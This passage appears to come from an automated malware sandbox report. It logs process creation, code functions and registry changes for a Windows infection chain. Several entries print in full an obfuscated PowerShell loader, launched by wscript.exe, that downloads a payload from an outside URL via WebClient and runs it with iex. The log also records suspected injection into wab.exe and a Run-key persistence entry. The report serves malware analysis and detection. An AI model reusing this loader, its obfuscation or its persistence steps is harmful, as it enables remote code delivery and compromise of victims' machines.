Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A00BD pushad ; iretd 2_2_00007FFD348A00C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34975479 push ebp; iretd 2_2_00007FFD34975538
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34976DCA push eax; iretd 2_2_00007FFD34976DCD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_079C1FB2 push eax; mov dword ptr [esp], ecx5_2_079C21B4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA2806 push ecx; ret 11_2_20EA2819
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EB1219 push esp; iretd 11_2_20EB121A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044693D push ecx; ret 16_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00451D54 push eax; ret 16_2_00451D61
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044B090 push eax; ret 17_2_0044B0A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044B090 push eax; ret 17_2_0044B0CC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00451D34 push eax; ret 17_2_00451D41
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00444E71 push ecx; ret 17_2_00444E81
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00414060 push eax; ret 18_2_00414074
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00414060 push eax; ret 18_2_0041409C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00414039 push ecx; ret 18_2_00414049
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LikvidationsprovenuetJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LikvidationsprovenuetJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
